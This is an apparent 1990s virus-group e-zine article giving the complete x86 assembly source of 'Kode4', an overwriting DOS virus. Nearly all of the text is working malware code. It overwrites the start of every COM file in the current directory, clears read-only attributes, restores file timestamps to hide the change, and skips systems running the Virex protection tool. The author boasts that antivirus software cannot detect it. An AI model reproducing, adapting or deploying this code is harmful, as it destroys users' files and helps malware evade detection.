ÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍ>>> Article From Evolution #2 - YAM '92 Article Title: Kode 4 v1 Virus Author: Soltan Griss ;###################################################################### ;# Name: Kode4 version 1.0 (overwritting stage) ;# Author: Soltan Griss [YAM] ;# ;# Description: What this sucker does is very simple. it overwrites ;# the first 46 bytes of all com files in the current ;# directory, with it's own code... as of scanv93, this ;# virus is undetectable.. ;# ;# ;# Special Thanks go out to Data Disruptor.. If it were not for you i ;# would still be fucking lost!!!! ;# ;###################################################################### seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h V_Length equ last-start KODE4 proc far start label near ;Check for Virex installiation mov ax,0ff0fh int 21h cmp ax,0101h ;Abort if Virex Protection je done ; present mov ah,4Eh ;Find first Com file mov dx,offset filename ;use "*.com" int 21h Back: mov ah,43h ;get rid of read only mov al,0 mov dx,9eh int 21h mov ah,43h mov al,01 and cx,11111110b int 21h mov ax,3D01h ;Open file for writing mov dx,9Eh ;get file name from file DTA int 21h mov bx,ax ;save handle in bx mov ah,57h ;get time date mov al,0 int 21h push cx ;put in stack for later push dx mov dx,100h ;Start writing at 100h mov cl,v_length ;write 46 bytes mov ah,40h ;Write Data into the file int 21h pop dx ;Restore old dates and times pop cx mov ah,57h mov al,01h int 21h mov ah,3Eh ;Close the file int 21h mov ah,4Fh ;Find Next file int 21h jnc Back mov ah,9h mov dx,offset DATA int 21h done: int 20h ;Terminate Program filename db "*.c*",0 DATA db " -=+ Kode4 +=-, The one and ONLY!$" kode4 endp LAST label near seg_a ends end start